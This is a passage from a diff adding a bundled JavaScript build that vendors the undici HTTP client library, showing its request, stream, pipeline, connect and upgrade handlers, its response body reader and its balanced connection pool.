signal) { + self[kSignal] = null + self[kListener] = null + + if (!signal) { + return + } + + if (signal.aborted) { + abort(self) + return + } + + self[kSignal] = signal + self[kListener] = () => { + abort(self) + } + + addAbortListener(self[kSignal], self[kListener]) +} + +function removeSignal (self) { + if (!self[kSignal]) { + return + } + + if ('removeEventListener' in self[kSignal]) { + self[kSignal].removeEventListener('abort', self[kListener]) + } else { + self[kSignal].removeListener('abort', self[kListener]) + } + + 
self[kSignal] = null + self[kListener] = null +} + +module.exports = { + addSignal, + removeSignal +} + + +/***/ }), + +/***/ 9744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { AsyncResource } = __nccwpck_require__(852) +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class ConnectHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_CONNECT') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.callback = callback + this.abort = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders () { + throw new SocketError('bad connect', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + removeSignal(this) + + this.callback = null + + let headers = rawHeaders + // Indicates is an HTTP2Session + if (headers != null) { + headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + } + + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function connect (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + connect.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const connectHandler = new ConnectHandler(opts, callback) + this.dispatch({ ...opts, method: 'CONNECT' }, connectHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = connect + + +/***/ }), + +/***/ 8752: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + Readable, + Duplex, + PassThrough +} = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +const kResume = Symbol('resume') + +class PipelineRequest extends Readable { + constructor () { + super({ autoDestroy: true }) + + this[kResume] = null + } + + _read () { + const { [kResume]: resume } = this + + if (resume) { + this[kResume] = null + resume() + } + } + + _destroy (err, callback) { + this._read() + + callback(err) + } +} + +class PipelineResponse extends Readable { + constructor (resume) { + super({ autoDestroy: true }) + this[kResume] = resume + } + + _read () { + this[kResume]() + } + + _destroy (err, callback) { + if 
(!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + callback(err) + } +} + +class PipelineHandler extends AsyncResource { + constructor (opts, handler) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof handler !== 'function') { + throw new InvalidArgumentError('invalid handler') + } + + const { signal, method, opaque, onInfo, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_PIPELINE') + + this.opaque = opaque || null + this.responseHeaders = responseHeaders || null + this.handler = handler + this.abort = null + this.context = null + this.onInfo = onInfo || null + + this.req = new PipelineRequest().on('error', util.nop) + + this.ret = new Duplex({ + readableObjectMode: opts.objectMode, + autoDestroy: true, + read: () => { + const { body } = this + + if (body && body.resume) { + body.resume() + } + }, + write: (chunk, encoding, callback) => { + const { req } = this + + if (req.push(chunk, encoding) || req._readableState.destroyed) { + callback() + } else { + req[kResume] = callback + } + }, + destroy: (err, callback) => { + const { body, req, res, ret, abort } = this + + if (!err && !ret._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (abort && err) { + abort() + } + + util.destroy(body, err) + util.destroy(req, err) + util.destroy(res, err) + + removeSignal(this) + + callback(err) + } + }).on('prefinish', () => { + const { req } = this + + // Node < 15 does not call _final in same tick. 
+ req.push(null) + }) + + this.res = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + const { ret, res } = this + + assert(!res, 'pipeline cannot be retried') + + if (ret.destroyed) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume) { + const { opaque, handler, context } = this + + if (statusCode < 200) { + if (this.onInfo) { + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.onInfo({ statusCode, headers }) + } + return + } + + this.res = new PipelineResponse(resume) + + let body + try { + this.handler = null + const headers = this.responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + body = this.runInAsyncScope(handler, null, { + statusCode, + headers, + opaque, + body: this.res, + context + }) + } catch (err) { + this.res.on('error', util.nop) + throw err + } + + if (!body || typeof body.on !== 'function') { + throw new InvalidReturnValueError('expected Readable') + } + + body + .on('data', (chunk) => { + const { ret, body } = this + + if (!ret.push(chunk) && body.pause) { + body.pause() + } + }) + .on('error', (err) => { + const { ret } = this + + util.destroy(ret, err) + }) + .on('end', () => { + const { ret } = this + + ret.push(null) + }) + .on('close', () => { + const { ret } = this + + if (!ret._readableState.ended) { + util.destroy(ret, new RequestAbortedError()) + } + }) + + this.body = body + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + res.push(null) + } + + onError (err) { + const { ret } = this + this.handler = null + util.destroy(ret, err) + } +} + +function pipeline (opts, handler) { + try { + const pipelineHandler = new PipelineHandler(opts, handler) + this.dispatch({ ...opts, body: pipelineHandler.req }, pipelineHandler) + return 
pipelineHandler.ret + } catch (err) { + return new PassThrough().destroy(err) + } +} + +module.exports = pipeline + + +/***/ }), + +/***/ 5448: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Readable = __nccwpck_require__(3858) +const { + InvalidArgumentError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class RequestHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError, highWaterMark } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (highWaterMark && (typeof highWaterMark !== 'number' || highWaterMark < 0)) { + throw new InvalidArgumentError('invalid highWaterMark') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_REQUEST') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.res = null + this.abort = null + this.body = body + this.trailers = {} + this.context = null + this.onInfo = onInfo || null + this.throwOnError = throwOnError + this.highWaterMark = highWaterMark + + if (util.isStream(body)) { + 
body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { callback, opaque, abort, context, responseHeaders, highWaterMark } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + const body = new Readable({ resume, abort, contentType, highWaterMark }) + + this.callback = null + this.res = body + if (callback !== null) { + if (this.throwOnError && statusCode >= 400) { + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body, contentType, statusCode, statusMessage, headers } + ) + } else { + this.runInAsyncScope(callback, null, null, { + statusCode, + headers, + trailers: this.trailers, + opaque, + body, + context + }) + } + } + } + + onData (chunk) { + const { res } = this + return res.push(chunk) + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + util.parseHeaders(trailers, this.trailers) + + res.push(null) + } + + onError (err) { + const { res, callback, body, opaque } = this + + removeSignal(this) + + if (callback) { + // TODO: Does this need queueMicrotask? + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (res) { + this.res = null + // Ensure all queued handlers are invoked before destroying res. 
+ queueMicrotask(() => { + util.destroy(res, err) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function request (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + request.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new RequestHandler(opts, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = request +module.exports.RequestHandler = RequestHandler + + +/***/ }), + +/***/ 5395: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { finished, PassThrough } = __nccwpck_require__(2781) +const { + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError +} = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { getResolveErrorBodyCallback } = __nccwpck_require__(7474) +const { AsyncResource } = __nccwpck_require__(852) +const { addSignal, removeSignal } = __nccwpck_require__(7032) + +class StreamHandler extends AsyncResource { + constructor (opts, factory, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + const { signal, method, opaque, body, onInfo, responseHeaders, throwOnError } = opts + + try { + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('invalid factory') + } + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + if (method === 'CONNECT') { + throw new InvalidArgumentError('invalid method') + } + + if (onInfo && typeof onInfo !== 'function') { + throw new 
InvalidArgumentError('invalid onInfo callback') + } + + super('UNDICI_STREAM') + } catch (err) { + if (util.isStream(body)) { + util.destroy(body.on('error', util.nop), err) + } + throw err + } + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.factory = factory + this.callback = callback + this.res = null + this.abort = null + this.context = null + this.trailers = null + this.body = body + this.onInfo = onInfo || null + this.throwOnError = throwOnError || false + + if (util.isStream(body)) { + body.on('error', (err) => { + this.onError(err) + }) + } + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = context + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const { factory, opaque, context, callback, responseHeaders } = this + + const headers = responseHeaders === 'raw' ? util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + + if (statusCode < 200) { + if (this.onInfo) { + this.onInfo({ statusCode, headers }) + } + return + } + + this.factory = null + + let res + + if (this.throwOnError && statusCode >= 400) { + const parsedHeaders = responseHeaders === 'raw' ? util.parseHeaders(rawHeaders) : headers + const contentType = parsedHeaders['content-type'] + res = new PassThrough() + + this.callback = null + this.runInAsyncScope(getResolveErrorBodyCallback, null, + { callback, body: res, contentType, statusCode, statusMessage, headers } + ) + } else { + if (factory === null) { + return + } + + res = this.runInAsyncScope(factory, null, { + statusCode, + headers, + opaque, + context + }) + + if ( + !res || + typeof res.write !== 'function' || + typeof res.end !== 'function' || + typeof res.on !== 'function' + ) { + throw new InvalidReturnValueError('expected Writable') + } + + // TODO: Avoid finished. It registers an unnecessary amount of listeners. 
+ finished(res, { readable: false }, (err) => { + const { callback, res, opaque, trailers, abort } = this + + this.res = null + if (err || !res.readable) { + util.destroy(res, err) + } + + this.callback = null + this.runInAsyncScope(callback, null, err || null, { opaque, trailers }) + + if (err) { + abort() + } + }) + } + + res.on('drain', resume) + + this.res = res + + const needDrain = res.writableNeedDrain !== undefined + ? res.writableNeedDrain + : res._writableState && res._writableState.needDrain + + return needDrain !== true + } + + onData (chunk) { + const { res } = this + + return res ? res.write(chunk) : true + } + + onComplete (trailers) { + const { res } = this + + removeSignal(this) + + if (!res) { + return + } + + this.trailers = util.parseHeaders(trailers) + + res.end() + } + + onError (err) { + const { res, callback, opaque, body } = this + + removeSignal(this) + + this.factory = null + + if (res) { + this.res = null + util.destroy(res, err) + } else if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + + if (body) { + this.body = null + util.destroy(body, err) + } + } +} + +function stream (opts, factory, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + stream.call(this, opts, factory, (err, data) => { + return err ? 
reject(err) : resolve(data) + }) + }) + } + + try { + this.dispatch(opts, new StreamHandler(opts, factory, callback)) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = stream + + +/***/ }), + +/***/ 6923: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError, RequestAbortedError, SocketError } = __nccwpck_require__(8045) +const { AsyncResource } = __nccwpck_require__(852) +const util = __nccwpck_require__(3983) +const { addSignal, removeSignal } = __nccwpck_require__(7032) +const assert = __nccwpck_require__(9491) + +class UpgradeHandler extends AsyncResource { + constructor (opts, callback) { + if (!opts || typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (typeof callback !== 'function') { + throw new InvalidArgumentError('invalid callback') + } + + const { signal, opaque, responseHeaders } = opts + + if (signal && typeof signal.on !== 'function' && typeof signal.addEventListener !== 'function') { + throw new InvalidArgumentError('signal must be an EventEmitter or EventTarget') + } + + super('UNDICI_UPGRADE') + + this.responseHeaders = responseHeaders || null + this.opaque = opaque || null + this.callback = callback + this.abort = null + this.context = null + + addSignal(this, signal) + } + + onConnect (abort, context) { + if (!this.callback) { + throw new RequestAbortedError() + } + + this.abort = abort + this.context = null + } + + onHeaders () { + throw new SocketError('bad upgrade', null) + } + + onUpgrade (statusCode, rawHeaders, socket) { + const { callback, opaque, context } = this + + assert.strictEqual(statusCode, 101) + + removeSignal(this) + + this.callback = null + const headers = this.responseHeaders === 'raw' ? 
util.parseRawHeaders(rawHeaders) : util.parseHeaders(rawHeaders) + this.runInAsyncScope(callback, null, null, { + headers, + socket, + opaque, + context + }) + } + + onError (err) { + const { callback, opaque } = this + + removeSignal(this) + + if (callback) { + this.callback = null + queueMicrotask(() => { + this.runInAsyncScope(callback, null, err, { opaque }) + }) + } + } +} + +function upgrade (opts, callback) { + if (callback === undefined) { + return new Promise((resolve, reject) => { + upgrade.call(this, opts, (err, data) => { + return err ? reject(err) : resolve(data) + }) + }) + } + + try { + const upgradeHandler = new UpgradeHandler(opts, callback) + this.dispatch({ + ...opts, + method: opts.method || 'GET', + upgrade: opts.protocol || 'Websocket' + }, upgradeHandler) + } catch (err) { + if (typeof callback !== 'function') { + throw err + } + const opaque = opts && opts.opaque + queueMicrotask(() => callback(err, { opaque })) + } +} + +module.exports = upgrade + + +/***/ }), + +/***/ 4059: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports.request = __nccwpck_require__(5448) +module.exports.stream = __nccwpck_require__(5395) +module.exports.pipeline = __nccwpck_require__(8752) +module.exports.upgrade = __nccwpck_require__(6923) +module.exports.connect = __nccwpck_require__(9744) + + +/***/ }), + +/***/ 3858: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// Ported from https://github.com/nodejs/undici/pull/907 + + + +const assert = __nccwpck_require__(9491) +const { Readable } = __nccwpck_require__(2781) +const { RequestAbortedError, NotSupportedError, InvalidArgumentError } = __nccwpck_require__(8045) +const util = __nccwpck_require__(3983) +const { ReadableStreamFrom, toUSVString } = __nccwpck_require__(3983) + +let Blob + +const kConsume = Symbol('kConsume') +const kReading = Symbol('kReading') +const kBody = Symbol('kBody') +const kAbort = Symbol('abort') 
+const kContentType = Symbol('kContentType') + +const noop = () => {} + +module.exports = class BodyReadable extends Readable { + constructor ({ + resume, + abort, + contentType = '', + highWaterMark = 64 * 1024 // Same as nodejs fs streams. + }) { + super({ + autoDestroy: true, + read: resume, + highWaterMark + }) + + this._readableState.dataEmitted = false + + this[kAbort] = abort + this[kConsume] = null + this[kBody] = null + this[kContentType] = contentType + + // Is stream being consumed through Readable API? + // This is an optimization so that we avoid checking + // for 'data' and 'readable' listeners in the hot path + // inside push(). + this[kReading] = false + } + + destroy (err) { + if (this.destroyed) { + // Node < 16 + return this + } + + if (!err && !this._readableState.endEmitted) { + err = new RequestAbortedError() + } + + if (err) { + this[kAbort]() + } + + return super.destroy(err) + } + + emit (ev, ...args) { + if (ev === 'data') { + // Node < 16.7 + this._readableState.dataEmitted = true + } else if (ev === 'error') { + // Node < 16 + this._readableState.errorEmitted = true + } + return super.emit(ev, ...args) + } + + on (ev, ...args) { + if (ev === 'data' || ev === 'readable') { + this[kReading] = true + } + return super.on(ev, ...args) + } + + addListener (ev, ...args) { + return this.on(ev, ...args) + } + + off (ev, ...args) { + const ret = super.off(ev, ...args) + if (ev === 'data' || ev === 'readable') { + this[kReading] = ( + this.listenerCount('data') > 0 || + this.listenerCount('readable') > 0 + ) + } + return ret + } + + removeListener (ev, ...args) { + return this.off(ev, ...args) + } + + push (chunk) { + if (this[kConsume] && chunk !== null && this.readableLength === 0) { + consumePush(this[kConsume], chunk) + return this[kReading] ? 
super.push(chunk) : true + } + return super.push(chunk) + } + + // https://fetch.spec.whatwg.org/#dom-body-text + async text () { + return consume(this, 'text') + } + + // https://fetch.spec.whatwg.org/#dom-body-json + async json () { + return consume(this, 'json') + } + + // https://fetch.spec.whatwg.org/#dom-body-blob + async blob () { + return consume(this, 'blob') + } + + // https://fetch.spec.whatwg.org/#dom-body-arraybuffer + async arrayBuffer () { + return consume(this, 'arrayBuffer') + } + + // https://fetch.spec.whatwg.org/#dom-body-formdata + async formData () { + // TODO: Implement. + throw new NotSupportedError() + } + + // https://fetch.spec.whatwg.org/#dom-body-bodyused + get bodyUsed () { + return util.isDisturbed(this) + } + + // https://fetch.spec.whatwg.org/#dom-body-body + get body () { + if (!this[kBody]) { + this[kBody] = ReadableStreamFrom(this) + if (this[kConsume]) { + // TODO: Is this the best way to force a lock? + this[kBody].getReader() // Ensure stream is locked. + assert(this[kBody].locked) + } + } + return this[kBody] + } + + dump (opts) { + let limit = opts && Number.isFinite(opts.limit) ? opts.limit : 262144 + const signal = opts && opts.signal + + if (signal) { + try { + if (typeof signal !== 'object' || !('aborted' in signal)) { + throw new InvalidArgumentError('signal must be an AbortSignal') + } + util.throwIfAborted(signal) + } catch (err) { + return Promise.reject(err) + } + } + + if (this.closed) { + return Promise.resolve(null) + } + + return new Promise((resolve, reject) => { + const signalListenerCleanup = signal + ? 
util.addAbortListener(signal, () => { + this.destroy() + }) + : noop + + this + .on('close', function () { + signalListenerCleanup() + if (signal && signal.aborted) { + reject(signal.reason || Object.assign(new Error('The operation was aborted'), { name: 'AbortError' })) + } else { + resolve(null) + } + }) + .on('error', noop) + .on('data', function (chunk) { + limit -= chunk.length + if (limit <= 0) { + this.destroy() + } + }) + .resume() + }) + } +} + +// https://streams.spec.whatwg.org/#readablestream-locked +function isLocked (self) { + // Consume is an implicit lock. + return (self[kBody] && self[kBody].locked === true) || self[kConsume] +} + +// https://fetch.spec.whatwg.org/#body-unusable +function isUnusable (self) { + return util.isDisturbed(self) || isLocked(self) +} + +async function consume (stream, type) { + if (isUnusable(stream)) { + throw new TypeError('unusable') + } + + assert(!stream[kConsume]) + + return new Promise((resolve, reject) => { + stream[kConsume] = { + type, + stream, + resolve, + reject, + length: 0, + body: [] + } + + stream + .on('error', function (err) { + consumeFinish(this[kConsume], err) + }) + .on('close', function () { + if (this[kConsume].body !== null) { + consumeFinish(this[kConsume], new RequestAbortedError()) + } + }) + + process.nextTick(consumeStart, stream[kConsume]) + }) +} + +function consumeStart (consume) { + if (consume.body === null) { + return + } + + const { _readableState: state } = consume.stream + + for (const chunk of state.buffer) { + consumePush(consume, chunk) + } + + if (state.endEmitted) { + consumeEnd(this[kConsume]) + } else { + consume.stream.on('end', function () { + consumeEnd(this[kConsume]) + }) + } + + consume.stream.resume() + + while (consume.stream.read() != null) { + // Loop + } +} + +function consumeEnd (consume) { + const { type, body, resolve, stream, length } = consume + + try { + if (type === 'text') { + resolve(toUSVString(Buffer.concat(body))) + } else if (type === 'json') { + 
resolve(JSON.parse(Buffer.concat(body))) + } else if (type === 'arrayBuffer') { + const dst = new Uint8Array(length) + + let pos = 0 + for (const buf of body) { + dst.set(buf, pos) + pos += buf.byteLength + } + + resolve(dst.buffer) + } else if (type === 'blob') { + if (!Blob) { + Blob = (__nccwpck_require__(4300).Blob) + } + resolve(new Blob(body, { type: stream[kContentType] })) + } + + consumeFinish(consume) + } catch (err) { + stream.destroy(err) + } +} + +function consumePush (consume, chunk) { + consume.length += chunk.length + consume.body.push(chunk) +} + +function consumeFinish (consume, err) { + if (consume.body === null) { + return + } + + if (err) { + consume.reject(err) + } else { + consume.resolve() + } + + consume.type = null + consume.stream = null + consume.resolve = null + consume.reject = null + consume.length = 0 + consume.body = null +} + + +/***/ }), + +/***/ 7474: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { + ResponseStatusCodeError +} = __nccwpck_require__(8045) +const { toUSVString } = __nccwpck_require__(3983) + +async function getResolveErrorBodyCallback ({ callback, body, contentType, statusCode, statusMessage, headers }) { + assert(body) + + let chunks = [] + let limit = 0 + + for await (const chunk of body) { + chunks.push(chunk) + limit += chunk.length + if (limit > 128 * 1024) { + chunks = null + break + } + } + + if (statusCode === 204 || !contentType || !chunks) { + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) + return + } + + try { + if (contentType.startsWith('application/json')) { + const payload = JSON.parse(toUSVString(Buffer.concat(chunks))) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? 
`: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + + if (contentType.startsWith('text/')) { + const payload = toUSVString(Buffer.concat(chunks)) + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers, payload)) + return + } + } catch (err) { + // Process in a fallback if error + } + + process.nextTick(callback, new ResponseStatusCodeError(`Response status code ${statusCode}${statusMessage ? `: ${statusMessage}` : ''}`, statusCode, headers)) +} + +module.exports = { getResolveErrorBodyCallback } + + +/***/ }), + +/***/ 7931: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + BalancedPoolMissingUpstreamError, + InvalidArgumentError +} = __nccwpck_require__(8045) +const { + PoolBase, + kClients, + kNeedDrain, + kAddClient, + kRemoveClient, + kGetDispatcher +} = __nccwpck_require__(3198) +const Pool = __nccwpck_require__(4634) +const { kUrl, kInterceptors } = __nccwpck_require__(2785) +const { parseOrigin } = __nccwpck_require__(3983) +const kFactory = Symbol('factory') + +const kOptions = Symbol('options') +const kGreatestCommonDivisor = Symbol('kGreatestCommonDivisor') +const kCurrentWeight = Symbol('kCurrentWeight') +const kIndex = Symbol('kIndex') +const kWeight = Symbol('kWeight') +const kMaxWeightPerServer = Symbol('kMaxWeightPerServer') +const kErrorPenalty = Symbol('kErrorPenalty') + +function getGreatestCommonDivisor (a, b) { + if (b === 0) return a + return getGreatestCommonDivisor(b, a % b) +} + +function defaultFactory (origin, opts) { + return new Pool(origin, opts) +} + +class BalancedPool extends PoolBase { + constructor (upstreams = [], { factory = defaultFactory, ...opts } = {}) { + super() + + this[kOptions] = opts + this[kIndex] = -1 + this[kCurrentWeight] = 0 + + this[kMaxWeightPerServer] = this[kOptions].maxWeightPerServer || 100 + this[kErrorPenalty] = 
this[kOptions].errorPenalty || 15 + + if (!Array.isArray(upstreams)) { + upstreams = [upstreams] + } + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) + ? opts.interceptors.BalancedPool + : [] + this[kFactory] = factory + + for (const upstream of upstreams) { + this.addUpstream(upstream) + } + this._updateBalancedPoolStats() + } + + addUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + if (this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + ))) { + return this + } + const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) + + this[kAddClient](pool) + pool.on('connect', () => { + pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) + }) + + pool.on('connectionError', () => { + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + }) + + pool.on('disconnect', (...args) => { + const err = args[2] + if (err && err.code === 'UND_ERR_SOCKET') { + // decrease the weight of the pool. 
+ pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + } + }) + + for (const client of this[kClients]) { + client[kWeight] = this[kMaxWeightPerServer] + } + + this._updateBalancedPoolStats() + + return this + } + + _updateBalancedPoolStats () { + this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) + } + + removeUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + const pool = this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + )) + + if (pool) { + this[kRemoveClient](pool) + } + + return this + } + + get upstreams () { + return this[kClients] + .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) + .map((p) => p[kUrl].origin) + } + + [kGetDispatcher] () { + // We validate that pools is greater than 0, + // otherwise we would have to wait until an upstream + // is added, which might never happen. + if (this[kClients].length === 0) { + throw new BalancedPoolMissingUpstreamError() + } + + const dispatcher = this[kClients].find(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + + if (!dispatcher) { + return + } + + const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) + + if (allClientsBusy) { + return + } + + let counter = 0 + + let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) + + while (counter++ < this[kClients].length) { + this[kIndex] = (this[kIndex] + 1) % this[kClients].length + const pool = this[kClients][this[kIndex]] + + // find pool index with the largest weight + if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { + maxWeightIndex = this[kIndex] + } + + // decrease the current weight every `this[kClients].length`. 
+ if (this[kIndex] === 0) { + // Set the current weight to the next lower weight. + this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] + + if (this[kCurrentWeight] <= 0) { + this[kCurrentWeight] = this[kMaxWeightPerServer] + } + } + if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { + return pool + } + } + + this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] + this[kIndex] = maxWeightIndex + return this[kClients][maxWeightIndex] + } +} + +module.exports = BalancedPool + + +/***/ }), + +/***/ 6101: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) +const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) +const { kHeadersList } = __nccwpck_require__(2785) +const { webidl } = __nccwpck_require__(1744) +const { Response, cloneResponse } = __nccwpck_require__(7823) +const { Request } = __nccwpck_require__(8359) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { fetching } = __nccwpck_require__(4881) +const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) +const assert = __nccwpck_require__(9491) +const { getGlobalDispatcher } = __nccwpck_require__(1892) + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation + * @typedef {Object} 